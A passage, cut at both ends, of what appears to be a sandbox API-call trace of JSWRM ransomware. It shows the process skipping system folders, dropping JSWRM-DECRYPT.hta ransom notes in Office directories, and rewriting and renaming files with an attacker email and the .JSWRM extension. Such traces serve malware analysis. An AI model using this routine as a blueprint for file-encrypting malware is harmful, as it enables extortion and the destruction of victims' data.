lpNumberOfBytesWritten=0x345e530*=0x5890, lpOverlapped=0x0) returned 1 [0136.848] CloseHandle (hObject=0x314) returned 1 [0136.848] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ru\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ru\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ru\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ru\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.850] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.850] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0136.851] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sk", cAlternateFileName="")) returned 1 [0136.851] lstrcmpiW (lpString1="sk", lpString2=".") returned 1 [0136.851] lstrcmpiW (lpString1="sk", lpString2="..") returned 1 [0136.851] lstrcmpiW (lpString1="sk", lpString2="...") returned 1 [0136.851] lstrcmpiW (lpString1="sk", lpString2="windows") returned -1 [0136.851] lstrcmpiW (lpString1="sk", lpString2="recovery") returned 1 [0136.851] lstrcmpiW (lpString1="sk", lpString2="perflogs") returned 1 [0136.851] lstrcmpiW (lpString1="sk", lpString2="documents and settings") returned 1 [0136.851] lstrcmpiW (lpString1="sk", lpString2="$RECYCLE.BIN") returned 1 [0136.851] lstrcmpiW (lpString1="sk", lpString2="system volume information") returned -1 [0136.851] lstrcmpiW (lpString1="sk", lpString2="msocache") returned 1 [0136.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sk\\jswrm-decrypt.hta")) returned 0xffffffff [0136.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.852] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.852] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.853] CloseHandle (hObject=0x238) returned 1 [0136.853] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sk\\jswrm-decrypt.hta")) returned 0x20 [0136.853] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sk\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x483bacb3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0136.854] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.854] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x483bacb3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.854] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.854] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.854] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x483bacb3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x483bacb3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x483bacb3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.854] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.854] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.854] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.854] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.854] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.854] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.854] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.854] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.854] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.854] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.855] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.855] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sk\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sk\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.855] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21656) returned 1 [0136.856] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.856] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5490, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5490, lpOverlapped=0x0) returned 1 [0136.858] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.858] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5490, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5490, lpOverlapped=0x0) returned 1 [0136.859] CloseHandle (hObject=0x314) returned 1 [0136.859] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sk\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sk\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sk\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sk\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.860] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x67a8250, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67a8250, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.860] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0136.860] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sl", cAlternateFileName="")) returned 1 [0136.860] lstrcmpiW (lpString1="sl", lpString2=".") returned 1 [0136.860] lstrcmpiW (lpString1="sl", lpString2="..") returned 1 [0136.860] lstrcmpiW (lpString1="sl", lpString2="...") returned 1 [0136.860] lstrcmpiW (lpString1="sl", lpString2="windows") returned -1 [0136.860] lstrcmpiW (lpString1="sl", lpString2="recovery") returned 1 [0136.860] lstrcmpiW (lpString1="sl", lpString2="perflogs") returned 1 [0136.860] lstrcmpiW (lpString1="sl", lpString2="documents and settings") returned 1 [0136.860] lstrcmpiW (lpString1="sl", lpString2="$RECYCLE.BIN") returned 1 [0136.860] lstrcmpiW (lpString1="sl", lpString2="system volume information") returned -1 [0136.860] lstrcmpiW (lpString1="sl", lpString2="msocache") returned 1 [0136.860] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sl\\jswrm-decrypt.hta")) returned 0xffffffff [0136.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.861] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.861] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.862] CloseHandle (hObject=0x238) returned 1 [0136.862] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sl\\jswrm-decrypt.hta")) returned 0x20 [0136.862] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sl\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x483bacb3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232100 [0136.862] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.862] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x483bacb3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.862] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.862] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.862] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x483bacb3, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x483bacb3, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x483bacb3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.862] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.862] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.862] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.862] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.862] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.863] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.863] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.863] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.863] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.863] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.863] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.863] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sl\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sl\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.865] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20632) returned 1 [0136.865] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.865] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5090, lpOverlapped=0x0) returned 1 [0136.867] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.867] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5090, lpOverlapped=0x0) returned 1 [0136.867] CloseHandle (hObject=0x314) returned 1 [0136.867] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sl\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sl\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sl\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sl\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.868] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, 